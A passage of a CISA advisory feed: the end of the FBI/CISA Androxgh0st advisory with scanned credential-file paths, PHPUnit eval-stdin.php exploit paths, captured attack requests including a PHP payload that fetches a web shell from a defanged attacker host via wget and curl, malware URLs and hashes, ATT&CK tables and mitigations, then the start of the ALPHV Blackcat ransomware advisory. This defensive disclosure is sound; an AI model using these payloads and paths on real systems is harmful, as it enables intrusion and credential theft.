4563. <li><strong>Note: </strong>the actor may attempt multiple different potential URI endpoints scanning for the <code>.env</code> file, for example <code>/docker/.env or /local/.env</code>.</li>
4564. </ul>
4565. </li>
4566. <li><code>/.aws/credentials</code></li>
4567. <li><code>/aws/credentials</code></li>
4568. <li><code>/.aws/config</code></li>
4569. <li><code>/.git</code></li>
4570. <li><code>/.test</code></li>
4571. <li><code>/admin</code></li>
4572. <li><code>/backend</code></li>
4573. <li><code>/app</code></li>
4574. <li><code>/current</code></li>
4575. <li><code>/demo</code></li>
4576. <li><code>/api</code></li>
4577. <li><code>/backup</code></li>
4578. <li><code>/beta</code></li>
4579. <li><code>/cron</code></li>
4580. <li><code>/develop</code></li>
4581. <li><code>/Laravel</code></li>
4582. <li><code>/laravel/core</code></li>
4583. <li><code>/gists/cache</code></li>
4584. <li><code>/test.php</code></li>
4585. <li><code>/info.php</code></li>
4586. <li><code>//.env</code></li>
4587. <li><code>/admin-app/.env%20</code></li>
4588. <li><code>/laravel/.env%20</code></li>
4589. <li><code>/shared/.env%20</code></li>
4590. <li><code>/.env.project%20</code></li>
4591. <li><code>/apps/.env%20</code></li>
4592. <li><code>/development/.env%20</code></li>
4593. <li><code>/live_env%20</code></li>
4594. <li><code>/.env.development%20</code></li>
4595. </ul>
4596. <h5><strong>Targeted URIs for web-shell drop:</strong></h5>
4597. <ul>
4598. <li><code>/.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4599. <li><code>//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4600. <li><code>//api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4601. <li><code>//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4602. <li><code>//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4603. <li><code>//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4604. <li><code>//demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4605. <li><code>//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4606. <li><code>//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4607. <li><code>//lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4608. <li><code>//lib/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
4609. <li><code>//lib/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4610. <li><code>//lib/phpunit/Util/PHP/eval-stdin.php</code></li>
4611. <li><code>//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4612. <li><code>//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4613. <li><code>//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4614. <li><code>//phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4615. <li><code>//phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
4616. <li><code>//phpunit/src/Util/PHP/eval-stdin.php</code></li>
4617. <li><code>//phpunit/Util/PHP/eval-stdin.php</code></li>
4618. <li><code>//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4619. <li><code>//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php</code></li>
4620. <li><code>//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4621. <li><code>//vendor/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
4622. <li><code>//vendor/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4623. <li><code>//vendor/phpunit/Util/PHP/eval-stdin.php</code></li>
4624. <li><code>//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4625. <li><code>//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4626. <li><code>//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4627. <li><code>//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4628. <li><code>//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4629. <li><code>/admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4630. <li><code>/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4631. <li><code>/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4632. <li><code>/api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php</code></li>
4633. <li><code>/lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4634. <li><code>/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4635. <li><code>/laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4636. <li><code>/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4637. <li><code>/laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4638. <li><code>/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4639. <li><code>/lib/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
4640. <li><code>/lib/phpunit/phpunit/Util/PHP/eval</code></li>
4641. <li><code>stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4642. <li><code>/lib/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4643. <li><code>/lib/phpunit/Util/PHP/eval-stdin.php</code></li>
4644. <li><code>/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4645. <li><code>/libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4646. <li><code>/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4647. <li><code>/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
4648. <li><code>/phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php</code></li>
4649. <li><code>/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4650. <li><code>./phpunit/Util/PHP/eval-stdin.php</code></li>
4651. <li><code>/phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4652. <li><code>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4653. <li><code>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev</code></li>
4654. <li><code>/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php</code></li>
4655. <li><code>/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4656. <li><code>/vendor/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4657. <li><code>/vendor/phpunit/Util/PHP/eval-stdin.php</code></li>
4658. <li><code>/vendor/phpunit/Util/PHP/eval-stdin.php%20</code></li>
4659. <li><code>/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4660. <li><code>/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4661. <li><code>/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4662. </ul>
4663. <h5><strong>An example of attempted credential exfiltration through (honeypot) open proxies:</strong></h5>
4664. <p><code>POST /.aws/credentials HTTP/1.1</code><br><code>host: www.example.com</code><br><code>user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36</code><br><code>accept-encoding: gzip, deflate</code><br><code>accept: */*</code><br><code>connection: keep-alive</code><br><code>content-length: 20</code><br><code>content-type: application/x-www-form-urlencoded</code><br><br><code>0x%5B%5D=androxgh0st</code></p>
4665. <h5><strong>An example of attempted web-shell drop through (honeypot) open proxies:</strong></h5>
4666. <p><code>GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1</code><br><code>host: www.example.com</code><br><code>user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76</code><br><code>accept-encoding: gzip, deflate</code><br><code>accept: */*</code><br><code>connection: keep-alive</code><br><code>x-forwarded-for: 200.172.238.135</code><br><code>content-length: 279</code><br><br><code><?php file_put_contents('evil.php',file_get_contents('hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt')); system('wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;curl hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php'); ?></code></p>
4667. <h5><strong>Monikers used instead of Androxgh0st (0x%5B%5D=???):</strong></h5>
4668. <ul>
4669. <li>Ridho</li>
4670. <li>Aws</li>
4671. <li>0x_0x</li>
4672. <li>x_X</li>
4673. <li>nopebee7</li>
4674. <li>SMTPEX</li>
4675. <li>evileyes0</li>
4676. <li>privangga</li>
4677. <li>drcrypter</li>
4678. <li>errorcool</li>
4679. <li>drosteam</li>
4680. <li>androxmen</li>
4681. <li>crack3rz</li>
4682. <li>b4bbyghost</li>
4683. <li>0x0day</li>
4684. <li>janc0xsec</li>
4685. <li>blackb0x</li>
4686. <li>0x1331day</li>
4687. <li>Graber</li>
4688. </ul>
4689. <h5><strong>Example malware drops through eval-stdin.php:</strong></h5>
4690. <p><code>hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt</code><br><code>59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4</code><br><br><code>hxxps://chainventures.co[.]uk/.well-known/aas</code><br><code>dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6</code><br><br><code>hxxp://download.asyncfox[.]xyz/download/xmrig.x86_64</code><br><code>23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066</code><br><br><code>hxxps://pastebin[.]com/raw/zw0gAmpC</code><br><code>ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72</code><br><br><code>hxxp://raw.githubusercontent[.]com/0x5a455553/MARIJUANA/master/MARIJUANA.php</code><br><code>0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef</code><br><br><code>hxxp://45.95.147[.]236/tmp.x86_64</code><br><code>6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc</code><br><br><code>hxxp://main.dsn[.]ovh/dns/pwer</code><br><code>bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7</code><br><br><code>hxxp://tangible-drink.surge[.]sh/configx.txt</code><br><code>de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba</code></p>
4691. <h3><strong>MITRE ATT&CK TACTICS AND TECHNIQUES</strong></h3>
4692. <p>See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.</p>
4693. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4694. <caption><em>Table 1: Reconnaissance</em></caption>
4695. <thead>
4696. <tr>
4697. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4698. <th scope="col" role="columnheader"><strong>ID</strong></th>
4699. <th scope="col" role="columnheader"><strong>Use</strong></th>
4700. </tr>
4701. </thead>
4702. <tbody>
4703. <tr>
4704. <td>Active Scanning: Vulnerability Scanning</td>
4705. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1595/002/" title="Active Scanning: Vulnerability Scanning">T1595.002</a></td>
4706. <td>The threat actor scans websites for specific vulnerabilities to exploit.</td>
4707. </tr>
4708. </tbody>
4709. </table>
4710. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4711. <caption><em>Table 2: Resource Development</em></caption>
4712. <thead>
4713. <tr>
4714. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4715. <th scope="col" role="columnheader"><strong>ID</strong></th>
4716. <th scope="col" role="columnheader"><strong>Use</strong></th>
4717. </tr>
4718. </thead>
4719. <tbody>
4720. <tr>
4721. <td>Acquire Infrastructure: Botnet</td>
4722. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1583/005/" title="Acquire Infrastructure: Botnet">T1583.005</a></td>
4723. <td>The threat actor establishes a botnet to identify and exploit victims.</td>
4724. </tr>
4725. <tr>
4726. <td>Acquire Infrastructure: Web Services</td>
4727. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1583/006/" title="Acquire Infrastructure: Web Services">T1583.006</a></td>
4728. <td>The threat actor creates new AWS instances to use for scanning.</td>
4729. </tr>
4730. </tbody>
4731. </table>
4732. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4733. <caption><em>Table 3: Initial Access</em></caption>
4734. <thead>
4735. <tr>
4736. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4737. <th scope="col" role="columnheader"><strong>ID</strong></th>
4738. <th scope="col" role="columnheader"><strong>Use</strong></th>
4739. </tr>
4740. </thead>
4741. <tbody>
4742. <tr>
4743. <td>Exploit Public-Facing Application</td>
4744. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td>
4745. <td>The threat actor exploits <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841">CVE-2017-9841</a> to remotely run hypertext preprocessor (PHP) code on websites via PHPUnit.</td>
4746. </tr>
4747. </tbody>
4748. </table>
4749. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4750. <caption><em>Table 4: Execution</em></caption>
4751. <thead>
4752. <tr>
4753. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4754. <th scope="col" role="columnheader"><strong>ID</strong></th>
4755. <th scope="col" role="columnheader"><strong>Use</strong></th>
4756. </tr>
4757. </thead>
4758. <tbody>
4759. <tr>
4760. <td>Command and Scripting Interpreter: Python</td>
4761. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1059/006/" title="Command and Scripting Interpreter: Python">T1059.006</a></td>
4762. <td>The threat actor uses Androxgh0st, a Python-scripted malware, to target victim files.</td>
4763. </tr>
4764. </tbody>
4765. </table>
4766. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4767. <caption><em>Table 5: Persistence</em></caption>
4768. <thead>
4769. <tr>
4770. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4771. <th scope="col" role="columnheader"><strong>ID</strong></th>
4772. <th scope="col" role="columnheader"><strong>Use</strong></th>
4773. </tr>
4774. </thead>
4775. <tbody>
4776. <tr>
4777. <td>Valid Accounts</td>
4778. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a></td>
4779. <td>The threat actor abuses the simple mail transfer protocol (SMTP) by exploiting exposed credentials.</td>
4780. </tr>
4781. <tr>
4782. <td>Server Software Component: Web Shell</td>
4783. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a></td>
4784. <td>The threat actor deploys web shells to maintain persistent access to systems.</td>
4785. </tr>
4786. <tr>
4787. <td>Create Account</td>
4788. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1136/" title="Create Account">T1136</a></td>
4789. <td>The threat actor attempts to create new users and user policies with compromised AWS credentials from a vulnerable website.</td>
4790. </tr>
4791. </tbody>
4792. </table>
4793. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4794. <caption><em>Table 6: Defense Evasion</em></caption>
4795. <thead>
4796. <tr>
4797. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4798. <th role="columnheader"><strong>ID</strong></th>
4799. <th role="columnheader"><strong>Use</strong></th>
4800. </tr>
4801. </thead>
4802. <tbody>
4803. <tr>
4804. <td>Obfuscated Files or Information: Command Obfuscation</td>
4805. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1027/010/" title="Obfuscated Files or Information: Command Obfuscation">T1027.010</a></td>
4806. <td>The threat actor can exploit a successfully identified Laravel application key to encrypt PHP code, which is then passed to the site as a value in the XSRF-TOKEN cookie.</td>
4807. </tr>
4808. </tbody>
4809. </table>
4810. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4811. <caption><em>Table 7: Credential Access</em></caption>
4812. <thead>
4813. <tr>
4814. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4815. <th role="columnheader"><strong>ID</strong></th>
4816. <th role="columnheader"><strong>Use</strong></th>
4817. </tr>
4818. </thead>
4819. <tbody>
4820. <tr>
4821. <td>Credential Access</td>
4822. <td><a href="https://attack.mitre.org/versions/v13/tactics/TA0006/" title="Credential Access">TA0006</a></td>
4823. <td>The threat actor can access the application key of the Laravel application on the site.</td>
4824. </tr>
4825. <tr>
4826. <td>Unsecured Credentials: Credentials in Files</td>
4827. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1552/001/" title="Unsecured Credentials: Credentials in Files">T1552.001</a></td>
4828. <td>The threat actor targets .env files that contain confidential credential information.</td>
4829. </tr>
4830. </tbody>
4831. </table>
4832. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4833. <caption><em>Table 8: Discovery</em></caption>
4834. <thead>
4835. <tr>
4836. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4837. <th role="columnheader"><strong>ID</strong></th>
4838. <th role="columnheader"><strong>Use</strong></th>
4839. </tr>
4840. </thead>
4841. <tbody>
4842. <tr>
4843. <td>File and Directory Discovery</td>
4844. <td><a href="https://attack.mitre.org/versions/v13/techniques/T1083/" title="File and Directory Discovery">T1083</a></td>
4845. <td>The threat actor can identify URLs for files outside root directory through a path traversal attack.</td>
4846. </tr>
4847. <tr>
4848. <td>Network Service Discovery</td>
4849. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a></td>
4850. <td>The threat actor uses Androxgh0st to abuse simple mail transfer protocol (SMTP) via scanning.</td>
4851. </tr>
4852. </tbody>
4853. </table>
4854. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4855. <caption><em>Table 9: Collection</em></caption>
4856. <thead>
4857. <tr>
4858. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4859. <th role="columnheader"><strong>ID</strong></th>
4860. <th role="columnheader"><strong>Use</strong></th>
4861. </tr>
4862. </thead>
4863. <tbody>
4864. <tr>
4865. <td>Email Collection</td>
4866. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1114/" title="Email Collection">T1114</a></td>
4867. <td>The threat actor interacts with application programming interfaces (APIs) to gather information.</td>
4868. </tr>
4869. </tbody>
4870. </table>
4871. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4872. <caption><em>Table 10: Command and Control</em></caption>
4873. <thead>
4874. <tr>
4875. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
4876. <th role="columnheader"><strong>ID</strong></th>
4877. <th role="columnheader"><strong>Use</strong></th>
4878. </tr>
4879. </thead>
4880. <tbody>
4881. <tr>
4882. <td>Ingress Tool Transfer</td>
4883. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a></td>
4884. <td>The threat actor runs PHP code through a POST request to download malicious files to the system hosting the website.</td>
4885. </tr>
4886. </tbody>
4887. </table>
4888. <h3><strong>MITIGATIONS</strong></h3>
4889. <p>The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
4890. <p>These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" target="_blank" title="Secure by Design">Secure by Design</a> webpage.</p>
4891. <p>The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.</p>
4892. <ul>
4893. <li><strong>Keep all operating systems, software, and firmware up to date. Specifically, ensure that Apache servers are not running versions 2.4.49 or 2.4.50.</strong> Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">known exploited vulnerabilities</a> in internet-facing systems.</li>
4894. <li><strong>Verify that the default configuration for all URIs is to deny all requests</strong> unless there is a specific need for it to be accessible.</li>
4895. <li><strong>Ensure that any live Laravel applications are not in “debug” or testing mode. Remove all cloud credentials from </strong><code><strong>.env</strong></code><strong> files and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file.</strong></li>
4896. <li><strong>On a one-time basis for previously stored cloud credentials, and on an on-going basis for other types of credentials that cannot be removed, review any platforms or services that have credentials listed in the </strong><code><strong>.env</strong></code><strong> file for unauthorized access or use.</strong></li>
4897. <li><strong>Scan the server’s file system for unrecognized PHP files</strong>, particularly in the root directory or <code>/vendor/phpunit/phpunit/src/Util/PHP</code> folder.</li>
4898. <li><strong>Review outgoing GET requests (via cURL command) to file hosting sites</strong> such as GitHub, pastebin, etc., particularly when the request accesses a <code>.php</code> file.</li>
4899. </ul>
4900. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
4901. <p>In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.</p>
4902. <p>To get started:</p>
4903. <ol>
4904. <li>Select an ATT&CK technique described in this advisory (see Tables 1-10).</li>
4905. <li>Align your security technologies against the technique.</li>
4906. <li>Test your technologies against the technique.</li>
4907. <li>Analyze your detection and prevention technologies’ performance.</li>
4908. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
4909. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
4910. </ol>
4911. <p>FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
4912. <h3><strong>REPORTING</strong></h3>
4913. <p>The FBI encourages organizations to report information concerning suspicious or criminal activity to their <a href="https://www.fbi.gov/contact-us/field-offices/" title="Field Offices">local FBI field office</a>. With regards to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.</p>
4914. <p>When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI <a href="https://www.ic3.gov/" title="Internet Crime Complaint Center (IC3)">Internet Crime Complaint Center (IC3)</a>, a <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">local FBI Field Office</a>, or to CISA via its <a href="https://www.cisa.gov/forms/report" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center at <a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or by calling 1-844-Say-CISA (1-844-729-2472).</p>
4915. <h3><strong>RESOURCES</strong></h3>
4916. <ul>
4917. <li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">CISA: Known Exploited Vulnerabilities Catalog</a></li>
4918. <li><a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">CISA, MITRE: Best Practices for MITRE ATT&CK Mapping</a></li>
4919. <li><a href="https://github.com/cisagov/Decider/" title="cisagov / decider">CISA: Decider Tool</a></li>
4920. <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841" title="CVE-2017-9841">NIST: CVE-2017-9841</a></li>
4921. <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15133" title="CVE-2018-15133">NIST: CVE-2018-15133</a></li>
4922. <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-41773" title="CVE-2021-41773">NIST: CVE-2021-41773</a></li>
4923. <li><a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">CISA: Cross-Sector Cybersecurity Performance Goals</a></li>
4924. <li><a href="https://www.cisa.gov/securebydesign" target="_blank" title="Secure by Design">CISA: Secure by Design</a></li>
4925. </ul>
4926. <h3><strong>REFERENCES</strong></h3>
4927. <ol>
4928. <li><a href="https://fortiguard.fortinet.com/threat-signal-report/5066/androxgh0st-malware-actively-used-in-the-wild" title="AndroxGh0st Malware Actively Used in the Wild">Fortinet - FortiGuard Labs: Threat Signal Report: AndroxGh0st Malware Actively Used in the Wild</a></li>
4929. </ol>
4930. <h3><strong>ACKNOWLEDGEMENTS</strong></h3>
4931. <p>Amazon contributed to this CSA.</p>
4932. <h3><strong>DISCLAIMER</strong></h3>
4933. <p>The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.</p>
4934. <h3><strong>VERSION HISTORY</strong></h3>
4935. <p>January 16, 2024: Initial version.</p>
4936. </description>
4937.  <pubDate>Fri, 12 Jan 2024 12:13:51 EST</pubDate>
4938.    <dc:creator>CISA</dc:creator>
4939.    <guid isPermaLink="false">/node/20718</guid>
4940.    </item>
4941. <item>
4942.  <title>#StopRansomware: ALPHV Blackcat</title>
4943.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a</link>
4944.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
4945. <p><strong><em>Note:</em></strong><em> This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
4946. <p>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as February 2024.</p>
4947. <p>This advisory provides updates to the FBI FLASH <a href="https://www.ic3.gov/Media/News/2022/220420.pdf" title="BlackCat/ALPHV Ransomware Indicators of Compromise">BlackCat/ALPHV Ransomware Indicators of Compromise</a> released April 19, 2022, and to this advisory released December 19, 2023. ALPHV Blackcat actors have since employed improvised communication methods by creating victim-specific emails to notify of the initial compromise. Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized. This is likely in response to the ALPHV Blackcat administrator’s post encouraging its affiliates to target hospitals after operational action against the group and its infrastructure in early December 2023.</p>
4948. <p>FBI, CISA, and HHS encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ALPHV Blackcat ransomware and data extortion incidents.</p>
4949. <p>In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which was rewritten to provide additional features to affiliates, such as better defense evasion and additional tooling. This ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, and VMWare instances. ALPHV Blackcat affiliates have extensive networks and experience with ransomware and data extortion operations.</p>
4950. <p>Download the PDF version of this report:</p>
4951.  
4952.  
4953.  
4954.  
4955.  
4956. <div class="c-file">
4957.    <div class="c-file__download">
4958.    <a href="https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf" class="c-file__link" target="_blank">AA23-353A #StopRansomware: ALPHV Blackcat (Update)</a>
4959.    <span class="c-file__size">(PDF,       578.24 KB
4960.  )</span>
4961.  </div>
4962. </div>
4963. <p>For a downloadable copy of IOCs, see:</p>
4964.  
4965.  
4966.  
4967.  
4968.  
4969. <div class="c-file">
4970.    <div class="c-file__download">
4971.    <a href="https://www.cisa.gov/sites/default/files/2024-02/AA23-353A.stix_.xml" class="c-file__link" target="_blank">AA23-353A STIX XML</a>
4972.    <span class="c-file__size">(XML,       46.14 KB
4973.  )</span>
4974.  </div>
4975. </div>
4976.  
4977.  
4978.  
4979.  
4980.  
4981. <div class="c-file">
4982.    <div class="c-file__download">
